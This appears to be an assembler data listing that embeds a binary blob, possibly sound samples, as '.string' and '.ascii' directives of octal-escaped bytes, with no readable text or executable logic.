"\362\367\370\013.;-\034#,-,\017\036(.9?6;\026\023\017\001\023\021\013\353\0316$&\033\034,\037\022\376\017\r\351\360\340\337\371\343\361\373\351\373\364\340\357\007\002\006\r\b\331\342\307\241\242\244\312\272\276\331\366\001\f\n\356\367\003\351\342\314\276\317\260\266\315\314\353\344\336\353\335\n\026\b'\035\032+\026\003\031\032\004\373\004\017\032'\030%)5G+=ZQGR<@V3\036%*30\037,(1/+V_^X99>\032\026\t\360\373\016\370\345\373\372\370\363\355\336\341\336\341\323\325\336\336\320\300\317\300\331\305\275\330\345\347\001\374\0179&'\376" .string "\021\375\356\343\324\351\335\314\333\323\341\356\355\340\370\r\b\005\371\363\373\355\352\353\347\367" .string "\350\351\016\022\016\024\016\0258)*\032\025\034\374\377\001\004\r\003\373\372\363\017\b\367\013\023*\032\034'\037#\032\030\022\020\022\372\334\327\347\346\350\366\341\004\024\004\006\365" .string "\007\376\354\350\357\376\341\336\360\351\003\005\373\006\372\003\005\365\367\375\001\356\346\345\362\360\335\341\337\353\f\007" .ascii "\b('\023!\007\017\035\002\023$%3-\026\024\"*\035\031\"$'\027" .ascii "\024\034\036\037\021\365\335\325\351\350\342\376\n\027(#2:1:" .ascii "#';:('@9" .string ";4\025+)!2\036)\"\032\023\370\006\004\360\361\326\311\336\320\312\325\323\331\352\356\344\342\355\347\327\317\333\347\332\307\270\301\314\312\303\260\307\317\326\342\311\342\362\342\327\307\305\314\275\277\260\263\315\321\325\343\365\t\016\362\373\001\376\363\350\344\356\376\372\356\346\362\361\365\362\371\022\035\037'&8F290/C&##\035)\"(*4@;2;FTM==;C, \032\030\031\030\024 1JJ;NZZ@<.&!\003\366\362\350\360\357\330\357\365\361\336\310\314\322\345\341\330\335\352\344\334\316\313\323\341\344\330\370\n\027\013\017\033\034\024\013\005\370\374\356\332\316\320\312\320\306\302\321\331\346\344\327\345\364\365\361\341\342\352\345\332\316\320\343\342\310\321\336\340\367\355\343\365\007\n\004\365\002\005\374\363\350\354\360\377\353\335\363\373\373\003\364\022$&*).+\025\007\374\370\007\360\360\354\370\006\025\026\0312371+-, \022" .string "\016\"\025\004\b\031\"# \03535!%\036\033!\t\371\371" .string "\017\001\001\377" .string "\022\t\002\017\034 \033\007\002\n\r\005\376\375\001\b\372\362\356\357\374\366\355\361\001\004\371\363\344\336\336\300\252\251\246\274\267\261\311\330\346\346\345\367\003\f\006\375\007\027\031\026\031\020\023\036\017\375\007\r\016\b\007\023\033\030\022\002\375\013\b\366\350\354\353\363\353\345\364\377\002\t\005\017\034\030\026\003\016\021\t\007\363\361" .string "\372\351\353\364\372" .string "\013\b\016\031\030\006\367\373\370\362\350\354\353\365\377\373\373\006\016\007\013\367\006\016\375\371\361\364\361\362\355\353\357\364\357\351\363\373\n\021\b\022 \036\033\024\r\r\020\006\375\370\373\002\364\355\364\375\003\377\003\001\n\f\004\016\371\367\007\362\363\370\362\363\361\365\367\003\016\025\032\035\034\031\032\021\002\003\001\355\354\355\352\346\334\326\320\323\325\322\311\317\335\340\343\350\354\355\372\354\364" .string "\370\t\006\004\017\032(417483\"(\"\032\016\006" .string "\375\002\371\365\375\004\017\f\016\022\021\020\t\b\001\003\003\366\367\365\356\370\365\355\376\375\002\t\001\013\f\t\006\377\003\b\003\377\362\355\360\347\342\342\347\353\363\371\362\373" .string "" .string "\375\362\376\367\361\353\337\343\333\340\334\337\362\356\371\377\367\013\020\003\t\t\t\t\005\002\375\377\377\376" .string "\003\004\007\f\t\t\016\021\013\013\f\t\r\005\376\372\366\367\360\355\365\363\370\373\377\377\n\017\007\021\r\022\027\023\f\t\b\004\001\371\376\376\376\372\366\373\367\372\365\353\342\326\321\307\302\300\272\303\315\325\335\346\363\372\376\b\025\031\034&&*/\"&%\025\034\022\f\024\f\017\017\f\022\017\023\017\t\013\b\377\374\375\365\366\367\371\367\376\003\005\377" .string "\007\004\005\006\004" .string "\376\375\367\365\371\355\370\365\356\376\376" .string "\007\001\003\004\005" .string "\374\374\364\366\355\360\360\365\364\357\357\362\360\360\363\352\354\361\373\373\374\006\003\375\003\003\005\005\t\013\007\025\023\024\032\021\031\037\027\027\031\024\024\013\t\b\005\006\002\005\001\003\007\013\t\016\017\023\020\022\020\b\t\002" .string "\372\374\002" .string "\001\004\007\005\n\022\n\r\b\002\006\375\374\370\360\352\352\341\342\336\320\314\306\306\276\306\312\320\324\332\334\331\342\346\345\343\352\363\371\373\005\t\017\027\030\031\035\032\030\024\023\f\006\t\372\372\366\360\365\365\355\363\360\356\361\361\362\357\367\362\356\360\362\355\360\364\360\360\363\364\363\364\365\370\365\367\373\376\001\376\372\374\375\377\367\366\364\355\361\354\352\357\360\362\370\372\377" .string "\003\005\377" .string "\374\373\373\367\367\366\365\367\372\004\007\f\025\031\037\"%%\"%&$\"#$$)'%+&&-%-+#'! \037\034\033\027\027\025\020\021\017\024\030\033\034\034#$ ## #\037\033\026\025\020\b\006\001\003\001\376\372\364\364\354\343\335\324\320\315\305\310\314\312\320\323\327\333\350\354\362\371\372" .ascii "\002\t" .string "\f\r\020\021\f\016\n\006" .string "\372\373\361\363\366\360\362\360\360\357\355\360\351\351\352\340\336\336\326\331\332\326\327\327\330\335\335\334\335\337\337\340\344\341\341\335\335\335\331\334\336\334\335\343\345\347\351\350\343\344\342\337\336\340\334\330\335\333\330\332\334\327\340\335\337\344\343\351\356\361\365\373" .string "\002\005\005\007\f\020\025\027\034\037#\037&#) &$#\"\"\034\036\031\033\017\007\370\365\"\342\022\037# EbV\001\322" .string "\354\023\024\002\360 \263\352\027\270\325\006\304\341\f\336\003\311\340\251\n:\355\006\004\376\3502<;*\320\261\257\330\320\247\324\304\272\314\021\026\017\030\346\022A6)Q\"\377\376\016\376\021\361\332" .string "\316\363\317\341\007\335\303\350\320\312\354\302\335\311\326\350\370.\021\373.2'/;\025\032C;:&\030\f,5\005\b&\032\002\356\002(\f\006" .string "\351%\363\374\025\355\336\340(\030\357\355\363\354\r\366\351*\020\357$MWE@04B>0\036\036\363\366\037'\003\001\037" .string "\311\323\323\307\370\326\275\346\344\355\313\334\321\313\342\321\347\351\350\363(,*\">)&-(O) EB\016\017+\"\365\355\377\356\344\343\321\307\306\276\301\364\344\302\306\332\337\303\335\333\322\347\345\365\007\377\357\337\363\b\360\350\373\365\356\355\336\355\341\330\002\027\031,\037IS=WSJ,\031\n\375\343\324\274\322\314\246\320\316\343\302\242\321\303\357\373\355\005\007\371\00717\036\0305$1B2$\035\030\037$&\024\023#\025\006\026\035\017(\023\020*2%\036\031\t\377\371-$%'\353\347\360\351\333\326\311\305\321\351\362\353\357\004\021\027 \002\002\025\022\0176(\021\033" .string "\023 \375\376\001\367\365\364%0\"\036\"\017\007\030\002\020\350\334\377\006\371\355\350\327\344\335\346\336\332\315\301\315\324\350\331\334\353\357\351\360\026\t\371\366\366\037' \023\021)\023\001\024\r\372\361\356\366\370\364\350\336\334\263\271\324\326\300\312\352\326\362\365\342\356\351\336\316\323\334\312\311\327\337\337\377\020\024\017\n\0052C+/(:\021'<&\035\022\r))\030 #\037\f\037.,\023\032\022\021\036\003\376\022\003\372\375\372" .string "\331\322\320\331\337\341\353\367\001\377\02508\037(.1,/,%0\023&.\"\370\345\357\301\334\340\337\364\353\360\357\n\026\n\005\026\032\r\0369953.\037\032\n\362\367\313\325\307\317\336\251\275\277\311\327\334\345\342\354\352\361\026\033\006\023\030\024\021\036\035\013\367\335\362\005\002\345\351\357\326\357\360\003\004\354\360\374\020\035\t\373\006\362\347\345\361\323\310\303\310\317\340\333\310\344\275\303\313\322\312\305\312\310\335\343\377\367\372\016" .string "\013\"%\017\027\035\037#\037 \023%\b\007,.\027(?,059;:17;:(\033\037\025\t\017\023" .string "\367\366\373\364\376\357\363\013\001\003):\023\r\b\017\375" .string "\366\353\354\336\340\343\003\375\354\346\351\337\340\342\350\350\364\n\f\0300\033\007&\017\03193!\030\")8:\037\023\035\030\016\030\026\007\375\373\374\367" .string "\361\343\333\327\330\324\320\315\277\257\264\304\273\263\273\261\300\277\327\354\354\346\351\366\004\b\r\007" .string "\002\364\001\007\005\343\342\347\346\337\337\336\315\330\340\355\020\032\030\032#61-0%\017\n\371\376\371\341\330\332\326\317\326\336\324\313\316\340\367\376\363\352\001\013\b\024.\016\001\026\t\037&\013\376\004\001\367\377\017\005\364\364\007\016\023&\037'-59NY9@BFPPOF+7/+&\375\371\377\377\374\373\375\370\355\365\360\362\346\332\311\314\326\316\333\341\344\326\341\342\346\341\326\347\337\351\364\377\020\004" .string "\b\020\017\025\026\f\007\003\375\004\017\007\365\363\372\372\372\375\376\362\356\370\375" .string "\b\374\366\b\f\n\020\n\021\007\001\001\t" .string "\363\357\353\364\344\357\354\344\337\344\351\352\351\342\330\324\324\320\331\344\323\304\322\335\343\327\323\326\334\326\317\321\323\323\307\311\344\324\344\365\366\004\375\r\022 \036\027\024\037\037\031\032\035\020\022\035\031%\034\027\033$&67AA9A>FHC2,-#\034%!\n\t\023\n\t\r\f\022\027\027\032%\032\016\r\031\023\003\006\371" .string "\375\353\360\341\314\310\255\271\260\247\273\266\300\273\312\330\353\364\365\376\027!\0310988A?<4'\027\032\032\005\003\f\002\363\371\376\375\n\003\374\022\003\005\f\023\021\377\n\030\f\376\376\362\357\356\356\345\350\342\320\322\334\327\320\327\330\324\325\340\344\353\352\336\336\346\341\326\333\340\323\310\322\341\334\322\325\322\336\335\325\327\336\324\311\335\336\336\352\364\365" .string "\n\f\022\032\031\020\031#\036\034\"##)&\037,.%%+0-1* %%\037-1\"#*#\030\036!\030\033\032\026\030\033\030\025\"\037\031\034\037\022\005\t\n\377\373\361\355\357\346\345\337\350\335\315\312\322\311\306\323\312\325\343\345\346\370\364\344\366\363\372\370\374\013\002\017\021\033\" \025\032%\037\033\035\"\034\034\033\031\030\031\020\t\n\007\003\374\375\370\347\360\356\356\371\356\347" .string "\373\356\006\001\375\374\007\n\377\001\375\373\375\370\357\352\351\344\327\325\330\317\306\310\311\304\306\315\321\331\333\335\340\355\364\345\350\357\341\342\344\337\337\341\333\334\342\341\335\337\350\353\360\366\374\377\005\003\025\035\035!(4*'/3,)$\"$ \031\032\037\034\024\032 \031\031\033 \"(''333;=2>@55,-'\036\031\003\b\020\006\366\363\372\355\351\343\340\335\327\320\322\332\333\327\337\352\347\346\360\370\363\367\371\372" .string "\004\001\004\016\013\005\007\f" .string "\366\372\370\364\365\366\364\364\365\351\355\375\363\357\375\366\364\355\356\363\357\361\351\353\363\363\350\355\363\356\357\361\361\364\364\361\362\371\372\367\377\002\002\003\003\f\b\001\002\374\006\373\360\365\367\372\350\350\357\352\354\360\344\346\355\342\352\360\357\353\366\004" .string "\004\r\027\024\020\021\017\027\025\n\t\017\007\376\002\004\375\375\376\376" .string "\375\375\377\017\b\b\016\023\023\021\033\020\031\021\013\024\016\n\003\375\013\002\367\377\007\007\001\017\f\017\025\027\032\037\031\023\037$\035\027\031\025\017\f\003\370\366\352\332\330\333\324\317\331\336\344\351\361\370\377\n\013\032'(+8@85;<93'\031\032\026\n\b\b" .string "\361\373\375\357\361\357\361\371\365\363\366\377\366\361\373\373\370\363\363\360\357\354\345\341\345\337\325\327\334\325\320\324\330\330\331\334\333\342\343\334\341\353\337\331\340\341\340\335\335\337\336\342\331\323\333\333\322\322\331\317\325\335\344\351\346\354\362" .ascii "\001\377\n\024\023\024\037\"!!$'''%%'#\032*( $#\005\r!\032\026" .ascii "\377\371\354\004\0375.4EBOCC6\035\006$#\027\037\004 \005\023" .ascii "\022\0062\026\006 \031\370\025\327\337\354\327\336\310\301\276" .ascii "\335\330\336\326\376\004\033\005\363\f\372\022\367\366\365\013" .ascii "\007\354\372\370\377\004\374\005\033)\"\023#\033\023\035\371" .ascii "\357\355\343\340\314\277\331\316\307\331\312\326\354\004\353" .ascii "\334\362\377\365\356\364\366\360\366\361\321\346\365\341\340" .ascii "\362\b\030\021\003\365\377\376\363\335\340\357\323\333\314\310" .ascii "\365\353\347\366\357\n\022\022\b\001\025\027\025\b\372\001\n" .ascii "\363\331\352\375\005\377\377\021$;33166-+%(\037\036\020\f(\032" .ascii "\030$\016*7\027!\032\037(\n\003\375\n\001\354\347\360\021\017" .ascii "\021\035#4:) #(#\020\002\374\371\370\332\311\316\337\330\313" .ascii "\317\306\332\341\323\333\337\353\367\333\335\352\347\351\335" .ascii "\326\346\375\t\376\007\024\032,\035\032\036' \r\004\005\r\363" .ascii "\343\352\357\371\374\363\372\n\022\036\f\f\027\035\027\370" .string "\366\360\352\357\326\307\342\353\345\341\346\367\002\t\376\377\026\031\b\376\375" .string "\372\375\357\342\363\375\371\363\364\374\004\001\363\357" .string "\005\364\336\333\333\335\332\304\306\351\350\341\372\001\026!\036\037#,5$\025\016\b\016" .string "\355\353\005\b\375\002\006\026(\036\024\0363,\036\032\025\026\022\016\374\373\n\b\001\005\006\024\037\022\006\n\025\023\004\364\366\376\375\362\354\363\007\004\375\375\006\030\032\023\f\r\020\n\362\344\326\316\311\265\252\254\301\304\301\304\326\363\376\376\002\021$(\024\026 \036\035\022\004\r\033\023\n\b\016\032\036\024\t\017\032\021\373\363\365\371\360\341\337\356\373\371\364\376\013\027\035\023\021\026\031\017\373\362\360\356\354\330\316\336\354\347\340\352\374\n\017\005\007\031\031\013\373\374\370\364\355\337\330\341\353\341\336\336\351\364\367\354\350\371\001\364\345\346\362\372\361\346\351\001\r\006\f\030(14.+74(\026\021\017\n\004\355\352\371\001\371\365" .string "\022\037\035\021\027(&\022\n\f\r\013" .string "\366\366\004\005\377" .string "\006\021\032\025\n\f\030\030\002\364\362\365\361\342\321\323\344\346\326\331\346\357\363\355\347\350\365\362\343\334\334\335\343\333\321\331\355\372\363\370\n\037(%\"+=6!\032\035\031\017\004\366\373\004\001\372\372\003\t\r\007\372\376\t\002\356\345\354\357\357\340\331\347\370\367\357\371\f\026\027\021\020\030\036\023" .string "\372\370\361\353\336\320\330\344\343\333\341\361\377\003\370\367\004\017" .string "\355\355\364\361\345\334\331\343\356\354\352\365\003\r\023\016\f\032#\036\016\r\022\024\021\005\002\023!\033\023\036273)+3. \013\t\b\001\370\353\347\362\374\367\362\375\020\034\036\032\033+3!\022\026\032\021\003\367\365" .string "\001\365\361\373\004\003\376\366\360\363\362\337\317\315\315\313\301\270\273\317\333\326\326\355\001\b\t\b\025 !\021\t\016\016\002\367\360\360\376\001\372\371\005\026\032\030\022\024 \036\t\375\001\004\372\347\340\345\356\353\341\341\361\373\366\371\364\373\003" .string "\364\347\356\361\347\342\334\343\365\371\360\362\t\026\024\r\t\r\024\007\356\346\352\344\323\311\304\311\316\320\313\320\343\361\366\370\373\006\025\025\006\003\017\023\t\377\377\n\025\022\n\023%*%#%),%\026\022\026\025\f\006\003\n\026\032\023\027+2.()11\"\021\r\022\b\370\362\365\374\376\002\001\b\030 \036 !%*$\021\t\r\007\367\351\346\350\347\335\322\325\341\340\332\334\341\346\352\345\341\343\353\353\352\357\365" .string "\r\022\023\033-4,)+-)\031\t\006\007\374\351\347\351\352\352\351\351\361\376\377\377\003\006\007\b\003\370\365\370\364\347\341\344\350\352\346\341\353\370\365\356\361\370\371\364\355\351\351\352\345\336\340\341\342\346\347\346\351\365\365\357\356\357\355\351\337\323\324\330\317\303\311\323\327\334\343\352\371\007\n\017\032!!#\"\034\033\036\033\022\016\017\022\023\016\013\021\034\026\017\025\032\030\020\t\n\013\007\004\376\003\t\007\016\022\025\032#&!#%$\036\025\r\f\f\003\365\367\375\373\370\370\374\002\006\002\377\004\004\374\366\363\354\347\346\341\333\333\340\343\347\353\356\371\005\007\006\016\030\030\026\025\027\031\031\025\021\030\034\031\031\037!!&$ \037\036\027\021\t\376\372\370\360\345\347\355\353\352\355\364\375\002\377\001\n\016\n\005\007\005" .string "\377\373\370\366\370\365\363\365\363\367\374\370\361\363\366\360\351\344\344\340\337\331\325\333\340\334\334\344\353\356\361\370\366\373\376\374\375\375\371\367\374\371\365\370\003\002\005\n\021\030\036\037\036%)\"\033\036\034\026\020\016\n\b\b\004\003\006\006\005\t\t\005\005\t\006\001\001\002\002\002\377\376\005\013\b\b\020\025\024\024\025\023\022\r\005\376\372\361\347\343\335\324\317\322\320\314\320\324\330\335\337\341\352\361\357\357\366\374\373\374\377\002\007\n\013\016\022\025\023\025\027\023\022\025\021\n\t\007\004\003\001\374" .string "\006\003" .string "\007\013\b\006\006\007\005\003\373\367\366\362\352\350\353\345\345\351\353\354\361\370\372" .string "\002\002\005\013\007\001\003\003\373\366\365\361\360\355\350\346\350\346\341\341\343\337\333\336\335\332\334\337\337\344\351\353\362\376\002\004\016\031\032\034!#$#\037\032\034\030\020\016\020\r\n\r\017\020\023\026\030\034\036\034\035!\036\030\030\032\025\020\017\016\016\r\n\n\016\017\013\f\021\017\f\r\r\013\n\n\b\t\t\005\007\013\t\005\006\t\004\375\373\366\360\353\343\334\334\331\321\320\326\330\330\337\347\356\366\377\005\017\027\032\036%%!#%!\035\033\031\027\026\021\016\021\017\n\006\n\007" .string "" .string "\375\373\372\371\365\366\370\367\370\375\377\376\001\005\005\003\004\003" .string "\377\372\365\366\364\355\352\356\356\353\355\357\361\363\365\364\367\371\365\362\364\361\352\350\350\342\336\334\333\332\332\331\331\340\344\342\345\354\360\360\364\371\374" .string "\003\004\t\017\020\022\032\036\034\037$\"\037\037\035\032\027\021\013\n\b" .string "\375" .string "\377\374\375" .string "\002\005\007\007\013\020\016\r\021\021\r\f\016\f\t\t\b\007\007\005\002\005\006\377\375\377\375\367\364\362\356\353\350\342\341\342\335\333\340\341\337\340\346\346\350\352\354\357\362\361\361\367\373\371\373\003\007\007\n\020\023\027\031\031\034 \034\031\033\032\024\021\020\r\b\006\003" .string "\377\374\370\372\373\366\365\370\366\363\362\363\363\364\364\361\365\371\367\364\372\375\375\375\001\001" .string "" .string "\376\375\374\367\363\366\366\361\333\364\357\352\376\031\f\025:\357\367\373\353\007\360\007*\366\331\031\002\335\373\356" .string "\003\332\372\367\265\312\337\327\377\020\362\354\355\374\361\345\376\020\r\355\374\026\006\347\374\t\022\021\032\031\347\326\347\344\277\335\004\331\256\301\324\325\300\342" .string "\375\0135[SU=6/\023\024)\341\334\371\276\320\355\353\371\370\346\374\363\343\017!\342\344\003\t\021\022(#\005\360\r\b\362\032\033\373\024!\026\f\374\002#\024\033B6\036#A'#))4\026\017!\001\357\"+\025\037*\027\f\b\364\376\326\337\023\362\371'#\016#\023\353\342\336\362 \004\371\027\353\327\353\354\355\347\360\001\363\356" .string "%\" *!\"\035\024\021\366\336\n\367\351\020\034\004\354\003\376\362\355\366\b\366\372\026\021\370\364\004\365\351\355\357\361\325\314\351\310\257\326\307\305\336\351\340\333\326\343\372\351" .string "#\022\365\006\371\334\340\334\360\362\351\0233\025\0240\005\373\005\360\372\347\332\345\334\315\346\377\361\364\r\b\371\f\n\021\001\347\001\005\351" .string "\027\373\371" .ascii "\004\b\016\03483)EC$%/\035\034 !\034\b\377\f\364\324\365" .string "\365\337\360\364\365\375\371\033=69QN:<:'\023\007\021\017\370\t\023\364\355\352\305\251\267\303\323\335\335\366\365\331\346\364\345\360\004\r\f\006\023&*!/3\020\033!\003\002\001\364\373\370\365\021\013\370\017\022\364\372\003\371\372\363\365\372\333\323\344\313\264\313\314\276\315\314\316\327\303\315\354\341\353\016\006\371\005\004\376\003\004\005\004\355\352\364\324\312\336\326\317\342\364\t\017\t\026\027\364\365\002\346\334\344\337\333\334\341\356\355\344\370\005\366\f!\023\023\031\024\037\033\03490\035/0\031\030\037\035\031\021\025\036\004\363\005\367\350\371\377\373\003\b\013\022\b\020&\034\03797-8AEB=D<$\"'\n\365\375\360\352\365\364\007\t\362\365\347\275\274\323\320\327\360\362\362\361\351\360\351\337\366\002\367\005\036\036'34?5.D=\"-,\022\016\016\006\001\371\361\356\334\306\314\305\266\306\315\313\317\323\332\340\325\340\372\362\362\021\022\002\t\007" .string "" .string "\373" .string "\005\361\351\363\346\327\340\335\326\327\322\327\325\307\323\334\315\337\373\001\n\033\031\021\007\370\371\356\327\341\352\334\342\361\361\363\364\374\016\017\024/2\",.\037\"%\"%\035\030\031\b\371" .ascii "\374\357\372\005\002\001\377" .string "\005\013" .string "\n$ \03767-0-)-&+7+*92*2,$!\032\031\020\372\375\375\347\353\374\367\366\371\354\335\310\267\302\315\312\335\366\363\365\001" .string "" .string "\003\n\032\036\"7=4??.*'\036\032\013\376\376\354\330\337\340\322\332\346\344\342\337\342\350\341\345\371\370\366\003\377\370\367\362\361\364\354\361\373\354\346\357\343\327\342\346\344\346\347\357\355\341\346\354\333\331\341\332\327\324\316\322\317\311\332\352\350\367\007\376\373\377\366\361\360\361\374\376\376\020\024\b\016\024\r\r\021\022\026\t\375\002\366\344\356\364\356\367\001\002\006\006\b\022\021\027+--86/.()* $,\033\017\027\r\377\006\013\r\023\025 '\037\")\037\035!\034\027\022\007\003\374\360\367\373\357\361\363\335\315\313\306\307\320\334\360\371\371\t\020\007\n\021\022\026\030\035(\"\032\"\027\004\007\004\367\371\371\361\356\351\347\355\352\354\375\377\371\002\004\375\372\367\373\376\363\365\377\361\346\354\346\334\340\340\340\343\335\336\337\324\324\335\326\325\340\342\341\343\342\346\342\327\340\345\327\332\346\337\336\347\353\363\372\374\t\f" .string "\002\002\362\355\355\347\350\350\351\360\353\347\362\360\346\364\375\370\377\007\007\t\b\013\027\026\025%*#&)$!\034\037%\033\033$\032\022\032\025\016\025\026\025\030\024\026\031\016\016\032\025\022\035##\"\037#\037\017\024\031\n\b\017\006\004\007\004\007\b\001\003\375\352\347\346\333\334\346\347\351\353\356\364\354\345\361\360\347\364\001\002\f\025\031 \035\032$\"\032#$\031\030\026\016\n\003\002\003\366\363\371\353\340\347\342\333\336\337\342\345\337\344\355\344\343\360\357\352\360\362\360\354\346\351\347\334\342\350\337\341\352\344\343\347\343\346\347\343\355\362\351\361\376\371\371\002\003" .string "\372\364\365\351\331\335\332\317\325\334\334\343\351\354\367\372\375\r\021\020 & %+*)'+0$!)\037\024\030\027\021\023\020\023\027\017\017\030\021\016\031\027\024\032\032\031\030\025\033\035\025\037*\"%/+&%!# \025\032\035\017\r\023\n\002" .string "\367\356\341\325\324\314\304\316\322\316\332\344\345\355\363\370\003\005\b\033!\037.70//+&\034\031\033\016\005\t\001\367\372\367\363\366\363\363\367\357\356\365\354\350\362\360\350\354\355\353\347\342\347\351\336\341\353\344\342\351\347\351\353\352\363\370\364\373\003\372\372\377\366\360\360\353\347\341\335\342\335\324\334\340\325\330\335\332\333\332\333\346\346\346\367" .string "\375\t\024\022\026\030\031\032\026\027\033\023\016\025\020\b\017\021\016\021\021\025\032\023\024 \034\027!$\037 \037\035\024\026\030\016\r\023\f\n\017\016\017\024\025\037%\",4+*1*\" \034\030\016\004\006\376\355\353\347\326\317\312\303\303\303\304\321\327\331\352\364\364\001\r\f\021\031\036\"!&/'\036$\037\022\020\r\b\005\375\373" .string "\366\362\373\367\362\370\370\364\365\363\362\360\351\354\357\345\345\356\347\343\351\350\351\351\347\356\362\350\355\366\356\353\362\361\356\357\356\360\354\345\350\345\331\333\335\324\325\332\330\333\335\337\350\350\342\355\361\347\351\360\354\352\354\357\365\362\364\377\375\371\002\004\001\007\t\n\020\017\021\031\025\025 \035\027\037 \032\030\026\027\024\f\017\025\013\t\021\016\013\017\017\022\025\022\030\037\032\035&! (&$$\"\"\033\021\024\017" .string "\377\002\370\365\367\365\366\362\355\363\357\343\346\350\337\340\345\344\347\351\353\361\360\360\372\367\363\376\002" .string "\b\016\021\027\025\030 \032\024\036\035\023\025\025\017\013\005\004\002\367\365\370\355\350\355\346\341\345\344\344\347\345\354\362\355\361\374\367\365\374\374\371\365\362\365\357\345\350\351\336\337\343\336\336\340\336\340\340\334\344\346\341\351\357\352\356\365\363\362\360\360\361\352\343\353\345\335\342\347\343\351\354\361\370\370\374\007\b\006\023\024\025\032# &!)$\"\035)\030\026\r\003\346\375&\032\370\335.\007M4\"\375\r'\005/\001\017\377\367\365$\005\n\036Y\003\345\030\340\004\350\276\006\f\213\275\261\327/JN1%\027\007\307\346\352\344\355\340\324\333\341\301\304\272\333\375" .string "\003\342\345\b\357\316\367\370\336\275\264\267\245\265\254\253\260\300\371\022\363\025!\027\031\355\001\373\344\331\301\333\357\356\373\022\360" .string "\030\377\r%3\020 $,<?K!\030,7\033\033#\0322KLVP8I;=F4*\022\020\032\023\006\003\364\020\017\370\026\f&>=7=?\"\024\373\336\313\264\260\255\274\307\307\316\327\377\320\270\303\313\331\360\361\331\333\324\343\312\340\331\337\r\335\351\020\021?H15;4\037\037\003\b)\006\005\0310G\"\035'.5.-\020\0348\n\t\037\367\003\375\351\002\002\032\005\376\005\370\023\030\f\030'\020\004\326\346\363\327\341\331\327\306\326\311\252\301\300\334\335\303\370\030\032\374\t\362\332\362\303\301\315\267\267\275\250\311\340\352\371\361\371\371\374\377\365" .string "\031\n\001\362\376\032%\007\t+1C?@?687\024\031,2\034\030+-6>9BWQdINV::\0313F<;\031\0319+\006\021\027\033\034\r\003\024\021\004\367\342\343\314\306\301\300\277\314\343\321\320\340\332\332\343\315\342\372\333\352\354\357\020\025\371\361\370\002\372\351\371\363\013" .string "\354\347\360\371\327\335\320\322\355\325\313\311\330\364\325\353\004\n\036\035\026\002!!\002\365\367\370\022\371\351\371\360\006\362\367\004\0324(\026\034\030\035\034\364\365\016\007\376\f\025\017\024 \025+-,\035\367\367\002\362\342\357\337\353" .string "\344\320\351\365\b\373\371\023\022\"\b\373\001\375\376\371\326\341\362\327\341\317\324\357\361\356\360\006\023\030\f\003\016\017\r\007\375\366\t" .string "\343\355\355\360\373\b\f/@HM4??/&\022\022\016\004\377\361\376\026\024\f\364\360\362\375\003\357\017#\033\030\033)'\021\021\023\034&46>a`TR;7: \016\n\b\003\371\352\345\356\007\355\355" .string "\375\004" .string "\367\367\377\001\363\343\324\312\321\276\264\253\261\312\307\275\327\337\345\356\353\327\344\367\321\325\325\310\330\312\257\271\262\273\300\265\262\302\340\341\335\370\t\n\005\357\351\363\357\326\316\324\340\352\355\366\b\r\033\r\n\033\027 \035\023\f\r\023\005\004\025\026*.%9EEF>LKMB(,-%\034\034\022!+!!685A5>IFB@?@<!\032\033\024\036\021\371\f\016\b\006\367\006\b\372\341\276\273\273\270\305\304\306\336\333\324\350\363\374" .string "\374\370\007\t\007\377\364\376\366\360\351\340\334\353\355\347\341\376\372\356\370\347\365\375\355\334\320\300\320\314\266\275\307\320\306\313\326\351\005\371\364\367\004\004\370\355\341\344\360\352\334\341\352\364\344\355\371\005\013\007\375\363\b\021\364\362\370\367\006\370\007\016\027&\032\021\031\035\037\033\003\b\007\f\n\377\002\f\022\376\006\023\031\035\034\026%26:,:=5\"\037\020\007\017\370\357\375\374\004\017\375\t (% \"$\035\026\374\001\021" .string "\363\357\355\361\376\365\367\f\026\037\032\f\f\n\377\367\344\337\360\350\330\321\325\330\321\306\274\300\310\314\327\307\333\355\336\324\320\336\337\343\336\343\354\001\022\031\"/<?6((.\031\377\367\373\374\353\347\334\343\346\357\353\352\007\004\004\016\n\023\031\b\007\005\004\007\007\370\354\364\003\365\370\003" .string "\t\r" .string "\376\f\007" .string "\003\371\377\007\371\365\355\361\362\357\357\003\n\n\031\026\n\030\032\003\371\350\343\355\334\316\341\343\351\355\365" .string "\n\032\027\023\032\033\036\032\006\005\007" .string "\364\365\357\360\370\371\375\006\r\033\021\007\023\027\023\006\020\377\374\003\355\363\356\350\366\362\353\373" .ascii "\003\003\376\f\f\020\026\016\021\022\013\377\370\375\372\374" .string "\367\361\377\004\373\367\356\346\327\325\317\273\272\277\306\276\310\336\340\355\367\370\n\022\032$!,2/2\"*#\022\021\004\r\021\020\r\r\021\026\031\035\t\021\035\024\024\016\021\003\375\364\364\365\364\372\371\355\374\003" .string "\003\375\n\t\377\003\003\004" .string "\374\374\364\376\003" .string "\001\002\001\006\377\364\367\370\354\345\354\351\346\345\346\342\345\356\373\360\361\367\366\372\371\376\366\377\001\376" .string "\370\363\372\356\345\361\355\363\372\366\002\006\b\r\025\031\027\037\027\r\016\013\006\375\371\001\376\371" .string "\001\372\372\376\372\371\377\002" .string "\367\367\373\372\375\370\376\005\005\032\030\023\037\032\033\024\t\n\b\372\364\352\345\342\335\334\325\322\314\317\315\305\320\331\325\335\352\363\370\373\377\376\373\376\004\374\002\016\022\033\031\035*#\037%!$$\035\033\016\017\013\007\t\374\376\002\366\363\377\373\371\002\377\373\377\007\005\375\366\372\377\365\374" .string "\001\374\377\002\375\013\003\006\013\373\004\t\374\374\372\362\364\361\357\355\353\353\355\365\367\372\n\013\t\t\t\006\371\363\356\350\335\342\347\345\360\365\363\372\002\b\022\027\032\033!\032\035!\027\023\033\025\017\021\017\021\b\003\t\f\t\f\013\013\t\b\007\013\007\006\r\t\005\n\r\007\b\n\007\013\016\013\r\013\r\016\b\005\001\377\374\360\361\364\355\361\363\361\364\363\363\361\347\343\331\322\311\301\304\305\300\276\307\306\307\326\332\333\355\367" .string "\r\016\030\037\033\034\037\036\026\026\016\t\005\377\003\373\361\367\366\357\366\360\360\363\353\351\352\357\353\355\362\350\356\366\364\366\375\003\375\375\377\375\373\366\364\356\346\355\353\352\353\350\354\362\370\365\377\005\376\004\b\376\003\006\371\377\372\370\374\365\361\363\361\355\355\357\363\364\370\372\001" .string "\n\023\024\030\034!\036#%\036!\"\"&\"(*'&&)*### !\035\"\037\035$!!$$#\035\035\037\033\031\026\033\025\021\025\021\021\024\025\033\034\033!!\037\033\027\023\020\017\007\002\365\354\354\337\322\316\307\303\302\302\312\316\320\331\343\346\350\367\372\365\377\001\376\002\005\n\b\013\f\t\n\005\005" .string 